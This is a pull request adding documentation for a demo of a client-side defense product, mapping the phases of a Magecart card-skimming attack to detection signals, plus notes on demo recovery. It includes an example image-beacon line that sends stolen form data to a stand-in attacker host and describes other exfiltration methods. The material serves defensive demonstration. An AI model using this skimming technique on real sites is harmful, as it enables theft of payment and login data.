### PR TITLE
docs: add Magecart kill chain mapping and demo session improvements

### DIFF
--- a/DEMO_PRODUCT_EXPERTISE.md
+++ b/DEMO_PRODUCT_EXPERTISE.md
@@ -66,6 +66,63 @@ Both must be configured for CSD to work end-to-end:
 | Man-in-the-browser | Form field reads |
 | Cryptojacking | Script inventory + network interactions |
 
+## Magecart Kill Chain
+
+Magecart is the umbrella term for groups that inject JavaScript skimmers
+into e-commerce and login pages to steal credentials and payment data.
+Notable breaches include British Airways (380,000 cards), Ticketmaster
+(40,000 cards), and thousands of smaller e-commerce sites. The attack
+follows a predictable kill chain that maps directly to CSD's three
+detection signals.
+
+| Attacker Phase | What happens | CSD Detection Signal | Demo-able via evaluate_script? |
+| -------------- | ------------ | -------------------- | ----------------------------- |
+| **Recon** | Enumerate form fields on the page (`querySelectorAll('input')`) | Form field reads | Yes (pure DOM) |
+| **Harvest** | Read sensitive field values (email, password, card number) | Form field reads | Yes (pure DOM) |
+| **Supply chain** | Inject `<script>` tags from external CDNs or compromised third parties | Script inventory | No (needs initScript) |
+| **Exfiltrate** | Send stolen data to attacker-controlled server via fetch, XHR, or image beacon | Network interactions | No (needs initScript) |
+
+Note: Recon and Harvest both trigger the **same** CSD detection signal
+(form field reads). These are distinct attacker actions but a single
+detection vector. CSD sees "which scripts read which fields" — it does
+not distinguish between enumerating fields and reading their values.
+
+**PCI DSS mapping:** The supply chain phase (unauthorized script loading)
+maps to **requirement 6.4.3** (script inventory and authorization). The
+exfiltration phase (unexpected network calls) maps to **requirement
+11.6.1** (tamper detection and change alerting).
+
+### Exfiltration Techniques
+
+Magecart skimmers use several exfiltration methods:
+
+- **fetch / XHR** — POST stolen data to an attacker endpoint. CSD
+  detects the destination domain via the network interactions signal.
+- **Image beacon** — `new Image().src = 'https://attacker.com/c?d=...'`
+  encodes stolen data in the URL. This avoids CORS restrictions entirely
+  and is invisible to the user. CSD's telemetry captures network request
+  metadata from monitored scripts, which includes image beacon
+  destinations initiated within the page context.
+- **navigator.sendBeacon** — fires a one-way POST that survives page
+  navigation. Used when the skimmer wants to exfiltrate on form submit.
+
+CSD does **not** block fetch/XHR calls via mitigation — mitigation
+targets script loading (`<script>` tag `src` interception). Exfiltration
+domains are surfaced in the detected domains list for network-level
+blocking by the security team.
+
+### Live Demo: zone.js Compatibility
+
+When demonstrating the Magecart kill chain on Angular applications
+(Juice Shop), `evaluate_script` works for **pure DOM queries**
+(`querySelectorAll`, reading `.value`, `.id`, `.name`) but fails when
+calling any zone.js-patched API (`fetch`, `Image`, `setTimeout`,
+`XMLHttpRequest`). This means:
+
+- **Recon and Harvest** can be demoed live via `evaluate_script`
+- **Supply chain injection and Exfiltration** require `initScript`
+  with pre-saved native API references (see Phase 2 attack documentation)
+
 ## F5 XC Platform Operations
 
 ### Console UI Navigation

--- a/DEMO_SOURCE_INDEX.md
+++ b/DEMO_SOURCE_INDEX.md
@@ -74,6 +74,7 @@
 | PCI-BLOG | <https://www.f5.com/company/blog/pci-dss-v4-0-browser-based-attacks> | PCI DSS v4.0, browser attacks, 6.4.3, 11.6.1 |
 | F5-PCI-BLOG | <https://www.f5.com/company/blog/distributed-cloud-client-side-defense-prepares-customers-for-pci-dss> | PCI DSS v4.0.1 CSD compliance mapping |
 | PCI-SSC-LIBRARY | <https://www.pcisecuritystandards.org/document_library/> | PCI DSS v4.0 standard documents |
+| PCI-DSS-V4-STANDARD | <https://www.pcisecuritystandards.org/document_library/?document=pci_dss> | PCI DSS v4.0.1 full standard — Section 6.4.3 (script inventory), Section 11.6.1 (tamper detection) |
 
 ## Threat Research & Standards
 
@@ -90,7 +91,8 @@
 | MITRE-EXFILTRATION | <https://attack.mitre.org/tactics/TA0010/> | Data exfiltration tactic TA0010 |
 | MITRE-RESOURCE-HIJACK | <https://attack.mitre.org/techniques/T1496/> | Resource hijacking T1496, cryptojacking |
 | AKAMAI-WEB-SKIMMING | <https://www.akamai.com/glossary/what-is-web-skimming> | Web skimming, digital skimming definition |
-| SANSEC-MAGECART | <https://sansec.io/what-is-magecart> | Magecart, formjacking, e-commerce skimming |
+| SANSEC-MAGECART | <https://sansec.io/what-is-magecart> | Magecart, formjacking, e-commerce skimming, group taxonomy, notable breaches (BA, Ticketmaster, NewEgg) |
+| ANGULAR-ZONE-JS | <https://angular.dev/guide/zone> | Angular zone.js API patching, browser API interception, implications for browser automation |
 | F5-CSD-PRIVACY | <https://www.f5.com/company/policies/f5-distributed-cloud-client-side-defense-privacy-statement> | CSD data collection, privacy, what telemetry contains |
 
 ## Question Routing Guide
@@ -104,6 +106,7 @@
 | "Can CSD detect X?" | LOCAL-OVERVIEW (boundaries) | F5-CSD-ABOUT |
 | "How do I automate X?" | LOCAL-API-AUTO | F5-COMMUNITY-AUTOMATION |
 | "What is Magecart?" | F5-ATTACK-VECTORS | WebSearch fallback |
+| "Walk me through a Magecart attack" | LOCAL-EXPERTISE (Magecart Kill Chain) | SANSEC-MAGECART |
 | "How do I configure X?" | LOCAL-XC-CONFIG | F5-CSD-HOWTO |
 | "What does the dashboard show?" | LOCAL-CSD-CONSOLE | F5-CSD-ABOUT |
 | "How does telemetry work?" | LOCAL-TELEMETRY | F5-CSD-ABOUT |

--- a/docs/demo/index.mdx
+++ b/docs/demo/index.mdx
@@ -1052,6 +1052,26 @@ The AI assistant operates in one of three modes during the demo:
 - Uses the CSD Product Expertise section in `DEMO_EXECUTOR.md` as the
   knowledge base for product questions
 
+### Browser Context Management
+
+initScript accumulation is a common source of demo failures. Each
+`navigate_page` call with an `initScript` parameter adds the script to
+a persistent list that runs on every subsequent document load. Follow
+these rules:
+
+- **Always navigate to `about:blank`** before any navigation with
+  `initScript` to clear accumulated scripts from prior runs
+- **Use `new_page` with `isolatedContext`** when switching between demo
+  phases (e.g., Phase 2 → Phase 3) to ensure a completely clean browser
+  state
+- **Recovery from unresponsive pages** — if `take_screenshot` or
+  `take_snapshot` timeouts occur, the browser context is
+  resource-exhausted. Use `new_page` with `isolatedContext` to create a
+  fresh context, then retry from the `about:blank` navigation step
+- See the [Phase 2 attack simulation](/csd/demo/phase-2-attack/) asides
+  for detailed guidance on transient origin failures and resource
+  exhaustion recovery
+
 ### Evidence Display Protocol
 
 After every API call, the AI assistant must present structured evidence to the human operator using this format:

--- a/docs/demo/phase-2-attack.mdx
+++ b/docs/demo/phase-2-attack.mdx
@@ -115,6 +115,10 @@ var _poll = _si(function() {
 **Saving native `fetch` in the initScript** — the initScript saves `window.fetch.bind(window)` before zone.js patches it. This ensures fetch calls work correctly without zone.js `Cannot read properties of undefined` errors. The same initScript (with native `fetch` saved) is used for both Phase 2 and Phase 3 attack runs — CSD mitigation does not intercept `fetch()` calls, so saving the native reference does not affect mitigation behavior.
 </Aside>
 
+<Aside type="caution">
+**Transient origin 404** — on first navigation to the Angular application, `polyfills.js` or other app scripts may return a transient HTTP 404 from the origin server. This causes Angular to fail bootstrapping, resulting in a blank page with no login form. The 404 is ephemeral — subsequent requests return 200 or 304. **Recovery:** navigate to `about:blank`, wait 2 seconds, then retry the navigation. If the issue persists across multiple retries, check origin health via the load balancer path (`curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js`).
+</Aside>
+
 ### Manual Execution
 
 Operators without browser automation tools perform the steps manually:
@@ -140,6 +144,8 @@ may cause some to fail with `ERR_INSUFFICIENT_RESOURCES` or timeout.
 The simulation succeeds if **any** CDN script loads. CSD detects the
 injection attempt regardless of whether the script loads successfully —
 the `&lt;script&gt;` tag creation itself is the detection signal.
+
+In severe cases, `ERR_INSUFFICIENT_RESOURCES` can escalate to a page-level failure — the entire page goes blank, screenshots timeout, and `take_snapshot` fails. This typically occurs after multiple navigations with heavy initScripts accumulate in the same browser context. **Recovery:** use `new_page` with `isolatedContext` to create a fresh browser context, then retry from the `about:blank` → `navigate_page` with initScript sequence. This is distinct from individual CDN script failures, which do not affect simulation success.
 </Aside>
 
 <Aside type="tip">

--- a/docs/demo/phase-3-mitigate.mdx
+++ b/docs/demo/phase-3-mitigate.mdx
@@ -211,7 +211,7 @@ curl -s \
 ```
 
 <Aside type="note">
-The mitigated domains list endpoint returns items with null metadata — individual domain names are not visible in the list response. Verify by checking that the item count equals the number of POST requests made (6 for the standard simulation). The `200` response from each individual POST in Step 3 is the authoritative evidence that each mitigation was created.
+The mitigated domains list endpoint returns items with null `metadata.name` for ALL items — individual domain names are not visible in the list response. Verify by checking that the item count equals the number of POST requests made (6 for the standard simulation). The `200` response from each individual POST in Step 3 is the authoritative evidence that each mitigation was created. If the count is 1 with a null-name item and no mitigations were applied, treat the count as 0 — this is a backend artifact (see [Pre-flight Check](/csd/demo/#pre-flight-check) for the decision rule).
 </Aside>
 
 ### Evidence


### PR DESCRIPTION
## Summary

- Added Magecart Kill Chain section to DEMO_PRODUCT_EXPERTISE.md mapping 4 attacker phases to CSD's 3 detection signals, with image beacon exfiltration and zone.js compatibility notes
- Expanded DEMO_SOURCE_INDEX.md with PCI DSS v4.0.1 reference, SANSEC-MAGECART topics, Angular zone.js reference, and Magecart walkthrough routing
- Added transient origin 404 recovery and ERR_INSUFFICIENT_RESOURCES page-level failure recovery asides to phase-2-attack.mdx
- Strengthened null metadata aside in phase-3-mitigate.mdx with verified finding that ALL mitigated_domains items return null names
- Added Browser Context Management subsection to index.mdx covering initScript accumulation and resource exhaustion recovery

Closes #402

## Test plan

- [ ] CI checks pass
- [ ] Markdown lint passes on all modified files
- [ ] Spelling check passes on new content